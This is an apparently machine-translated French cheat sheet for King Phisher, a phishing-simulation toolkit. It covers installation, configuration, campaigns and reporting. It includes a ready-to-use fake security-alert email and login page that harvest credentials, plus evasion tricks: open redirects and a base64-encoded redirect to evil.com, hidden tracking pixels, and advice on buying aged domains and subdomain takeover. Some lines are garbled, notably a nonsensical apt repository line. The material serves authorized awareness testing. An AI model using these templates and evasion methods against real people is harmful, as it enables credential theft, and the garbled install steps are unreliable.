Roi Phisher Génie social Boîte à outils Feuille de chaleur
Aperçu général
King Phisher est une trousse de campagne d'hameçonnage de qualité professionnelle développée par RSM US LLP pour tester et promouvoir la sensibilisation des utilisateurs en simulant des attaques d'hameçonnage dans le monde réel. Il fournit un cadre complet pour la création, la gestion et l'analyse de campagnes d'hameçonnage avec des capacités de rapport avancées.
C'est pas vrai. Attention : Cet outil est réservé aux essais de sécurité et à la formation de sensibilisation. Assurez-vous d'avoir une autorisation appropriée avant de mener des campagnes d'hameçonnage.
Installation
Installation Ubuntu/Debian
# Add King Phisher repository
wget -q https://github.com/rsmusllp/king-phisher/raw/master/data/client/king_phisher_icon.ico
echo 'deb https://github.com/rsmusllp/king-phisher/raw/master/data/server/king_phisher_server.py /'|sudo tee /etc/apt/sources.list.d/king-phisher.list
# Install via package manager
sudo apt update
sudo apt install king-phisher
# Manual installation
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
sudo ./tools/install.sh
CentOS/RHEL Installation
# Install dependencies
sudo yum install python3 python3-pip git
# Clone repository
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
# Install Python dependencies
pip3 install -r requirements.txt
# Install King Phisher
sudo ./tools/install.sh
```_
### Installation Docker
```bash
# Build Docker image
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
docker build -t king-phisher .
# Run King Phisher server
docker run -it -p 80:80 -p 443:443 king-phisher
```_
## Utilisation de base
### Démarrer King Phisher Server
```bash
# Start server with default configuration
sudo king-phisher-server
# Start with custom configuration
sudo king-phisher-server -c /path/to/config.yml
# Start with specific interface
sudo king-phisher-server -a 0.0.0.0
# Start with custom port
sudo king-phisher-server -p 8080
Lancement du client King Phisher
# Start GUI client
king-phisher-client
# Connect to remote server
king-phisher-client --server https://server.com
# Use specific configuration
king-phisher-client --config /path/to/client_config.json
Configuration
Configuration du serveur (server_config.yml)
# Basic server configuration
server:
bind:
host: 0.0.0.0
port: 80
ssl:
enabled: true
host: 0.0.0.0
port: 443
cert: /path/to/cert.pem
key: /path/to/key.pem
# Database configuration
database:
driver: postgresql
host: localhost
port: 5432
database: king_phisher
username: king_phisher
password: password
# Email configuration
email:
smtp:
host: smtp.gmail.com
port: 587
username: your-email@gmail.com
password: app-password
use_tls: true
# Logging configuration
logging:
level: INFO
file: /var/log/king-phisher.log
Configuration du client
\\\\{
"server": "https://king-phisher.local",
"server_username": "username",
"server_use_ssl": true,
"server_verify_ssl": false,
"gui": \\\\{
"show_campaign_graph": true,
"show_campaign_map": true
\\\\}
\\\\}
Gestion des campagnes
Création de campagnes
# Campaign components:
# 1. Email template
# 2. Landing page
# 3. Target list
# 4. SMTP configuration
# 5. Campaign settings
Modèles de courriel
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Security Alert</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 20px; \\\\}
.header \\\\{ background: #d32f2f; color: white; padding: 10px; \\\\}
.content \\\\{ padding: 20px; \\\\}
.button \\\\{ background: #1976d2; color: white; padding: 10px 20px; text-decoration: none; \\\\}
</style>
</head>
<body>
<div class="header">
<h2>Security Alert - Immediate Action Required</h2>
</div>
<div class="content">
<p>Dear \\\\{\\\\{ client.first_name \\\\}\\\\} \\\\{\\\\{ client.last_name \\\\}\\\\},</p>
<p>We have detected suspicious activity on your account associated with \\\\{\\\\{ client.email_address \\\\}\\\\}.</p>
<p>Please verify your account immediately to prevent suspension.</p>
<p><a href="\\\\{\\\\{ url.webserver \\\\}\\\\}" class="button">Verify Account Now</a></p>
<p>This link will expire in 24 hours.</p>
<p>Best regards,<br>IT Security Team</p>
</div>
</body>
</html>
Pages d'atterrissage
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Account Verification</title>
<style>
body \\\\{ font-family: Arial, sans-serif; background: #f5f5f5; margin: 0; padding: 50px; \\\\}
.container \\\\{ max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); \\\\}
input \\\\{ width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; \\\\}
button \\\\{ width: 100%; background: #1976d2; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; \\\\}
.logo \\\\{ text-align: center; margin-bottom: 30px; \\\\}
</style>
</head>
<body>
<div class="container">
<div class="logo">
<h2>Account Verification</h2>
</div>
<form method="post" action="\\\\{\\\\{ url.webserver \\\\}\\\\}">
<input type="hidden" name="rid" value="\\\\{\\\\{ client.uid \\\\}\\\\}">
<input type="text" name="username" placeholder="Username or Email" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Verify Account</button>
</form>
<p style="font-size: 12px; color: #666; text-align: center; margin-top: 20px;">
This verification is required to maintain account security.
</p>
</div>
</body>
</html>
Listes cibles
# CSV format for target import
first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Jane,Smith,jane.smith@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson@company.com,Finance,Acme Corp
Alice,Williams,alice.williams@company.com,Marketing,Acme Corp
Caractéristiques avancées
Variables du modèle
\\\\{\\\\{ client.first_name \\\\}\\\\}
\\\\{\\\\{ client.last_name \\\\}\\\\}
\\\\{\\\\{ client.email_address \\\\}\\\\}
\\\\{\\\\{ client.company_name \\\\}\\\\}
\\\\{\\\\{ client.department \\\\}\\\\}
\\\\{\\\\{ url.webserver \\\\}\\\\}
\\\\{\\\\{ url.tracking_image \\\\}\\\\}
\\\\{\\\\{ time.local \\\\}\\\\}
\\\\{\\\\{ time.utc \\\\}\\\\}
Champs personnalisés
# Add custom fields to campaigns
custom_fields = \\\\{
'employee_id': 'EMP001',
'manager': 'John Manager',
'location': 'New York Office',
'security_level': 'Standard'
\\\\}
Plugins et Extensions
# King Phisher plugin structure
import king_phisher.plugins as plugin_manager
class CustomPlugin(plugin_manager.ClientPlugin):
authors = ['Your Name']
title = 'Custom Plugin'
description = 'Custom functionality for King Phisher'
version = '1.0'
def initialize(self):
# Plugin initialization code
pass
def finalize(self):
# Plugin cleanup code
pass
Rapports et analyses
Statistiques des campagnes
# Access campaign data via API
import king_phisher.client.client_rpc as client_rpc
# Connect to server
rpc = client_rpc.KingPhisherRPCClient(
('server.com', 443),
username='admin',
password='password',
use_ssl=True
)
# Get campaign statistics
campaign_id = 1
stats = rpc.remote_table_row('campaigns', campaign_id)
messages = rpc.remote_table('messages', query_filter=\\\\{'campaign_id': campaign_id\\\\})
visits = rpc.remote_table('visits', query_filter=\\\\{'campaign_id': campaign_id\\\\})
credentials = rpc.remote_table('credentials', query_filter=\\\\{'campaign_id': campaign_id\\\\})
print(f"Messages sent: \\\\{len(messages)\\\\}")
print(f"Visits: \\\\{len(visits)\\\\}")
print(f"Credentials harvested: \\\\{len(credentials)\\\\}")
Analyse géographique
# Analyze visitor geographic data
import geoip2.database
def analyze_visitor_locations(visits):
reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
locations = \\\\{\\\\}
for visit in visits:
try:
response = reader.city(visit['visitor_ip'])
country = response.country.name
city = response.city.name
location = f"\\\\{city\\\\}, \\\\{country\\\\}"
locations[location] = locations.get(location, 0) + 1
except:
pass
return locations
Analyse chronologique
# Analyze campaign timeline
import datetime
import matplotlib.pyplot as plt
def plot_campaign_timeline(visits):
timestamps = [datetime.datetime.fromisoformat(v['visit_time']) for v in visits]
timestamps.sort()
# Group by hour
hourly_counts = \\\\{\\\\}
for ts in timestamps:
hour = ts.replace(minute=0, second=0, microsecond=0)
hourly_counts[hour] = hourly_counts.get(hour, 0) + 1
# Plot timeline
hours = list(hourly_counts.keys())
counts = list(hourly_counts.values())
plt.figure(figsize=(12, 6))
plt.plot(hours, counts, marker='o')
plt.title('Campaign Activity Timeline')
plt.xlabel('Time')
plt.ylabel('Visits')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('campaign_timeline.png')
Caractéristiques de sécurité
SSL/TLS Configuration
# Generate SSL certificate
openssl req -newkey rsa:4096 -nodes -keyout king-phisher.key -x509 -days 365 -out king-phisher.crt
# Configure Let's Encrypt
certbot certonly --standalone -d yourdomain.com
Authentification et autorisation
# User authentication configuration
authentication:
provider: pam # or ldap, database
# LDAP configuration
ldap:
server: ldap://ldap.company.com
base_dn: dc=company,dc=com
user_filter: (sAMAccountName=\\\\{username\\\\})
# Database authentication
database_auth:
table: users
username_column: username
password_column: password_hash
Contrôle d'accès
# Role-based access control
user_permissions = \\\\{
'admin': ['campaign.create', 'campaign.delete', 'user.manage'],
'operator': ['campaign.create', 'campaign.view'],
'viewer': ['campaign.view']
\\\\}
Intégration de l'API
API REST Utilisation
# King Phisher REST API client
import requests
import json
class KingPhisherAPI:
def __init__(self, server_url, username, password):
self.server_url = server_url
self.session = requests.Session()
self.authenticate(username, password)
def authenticate(self, username, password):
auth_data = \\\\{
'username': username,
'password': password
\\\\}
response = self.session.post(f"\\\\{self.server_url\\\\}/api/login", json=auth_data)
return response.status_code == 200
def get_campaigns(self):
response = self.session.get(f"\\\\{self.server_url\\\\}/api/campaigns")
return response.json()
def create_campaign(self, campaign_data):
response = self.session.post(f"\\\\{self.server_url\\\\}/api/campaigns", json=campaign_data)
return response.json()
def get_campaign_stats(self, campaign_id):
response = self.session.get(f"\\\\{self.server_url\\\\}/api/campaigns/\\\\{campaign_id\\\\}/stats")
return response.json()
Intégration de Webhook
# Webhook for real-time notifications
from flask import Flask, request
import json
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def handle_webhook():
data = request.get_json()
if data['event_type'] == 'visit':
# Handle website visit
print(f"New visit from \\\\{data['visitor_ip']\\\\}")
elif data['event_type'] == 'credentials':
# Handle credential submission
print(f"Credentials submitted: \\\\{data['username']\\\\}")
return 'OK'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
Techniques d'évacuation
Évasion par courriel
From: IT Security ``<security@company-portal.com>``
Subject: [Action Required] Account Security Verification
<a href="https://company-portal.com/redirect?url=https://evil.com">Click Here</a>
<img src="\\\\{\\\\{ url.tracking_image \\\\}\\\\}" style="display:none;width:1px;height:1px;">
Réputation de domaine
# Use aged domains
# Purchase expired domains with good reputation
# Use subdomain takeover techniques
# Implement proper SPF/DKIM/DMARC records
# Example SPF record
v=spf1 include:_spf.google.com ~all
# Example DKIM record
v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...
# Example DMARC record
v=DMARC1; p=quarantine; rua=mailto:dmarc@company.com
Obfuscation du contenu
<a href="https://evil.com">Verify Account</a>
<script>
var encoded = "aHR0cHM6Ly9ldmlsLmNvbQ==";
var decoded = atob(encoded);
window.location.href = decoded;
</script>
<span style="display:none;">PHISHING</span>Legitimate<span style="display:none;">ATTACK</span> Content
Dépannage
Problèmes de serveur
# Check server status
sudo systemctl status king-phisher
# View server logs
sudo journalctl -u king-phisher -f
# Test server connectivity
curl -k https://localhost/ping
# Check database connection
sudo -u king-phisher psql -d king_phisher -c "SELECT version();"
Questions relatives à la livraison des courriels
# Test SMTP configuration
python3 -c "
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login('user@gmail.com', 'password')
server.quit()
print('SMTP connection successful')
"
# Check DNS records
dig TXT company.com|grep spf
dig TXT _domainkey.company.com
dig TXT _dmarc.company.com
# Test email deliverability
echo 'Test email'|mail -s 'Test Subject' test@company.com
Problèmes SSL/TLS
# Verify certificate
openssl x509 -in /path/to/cert.pem -text -noout
# Test SSL configuration
openssl s_client -connect domain.com:443 -servername domain.com
# Check certificate chain
curl -vI https://domain.com
Problèmes de performance
# Monitor resource usage
top -p $(pgrep king-phisher)
# Check database performance
sudo -u postgres psql -d king_phisher -c "
SELECT schemaname,tablename,attname,n_distinct,correlation
FROM pg_stats
WHERE schemaname='public';
"
# Optimize database
sudo -u postgres psql -d king_phisher -c "VACUUM ANALYZE;"
Ressources
- [Site Web officiel de King Phisher] (LINK_5)
- Documentation du roi Phisher
- RSM US LLP Security
- [Formation à la sensibilisation au phishing] (LINK_5)
- Meilleures pratiques en matière de sécurité du courriel
*Cette feuille de triche fournit une référence complète pour l'utilisation de King Phisher. Assurez-vous toujours d'avoir une autorisation appropriée et de suivre les directives éthiques lors de la conduite de simulations d'hameçonnage. *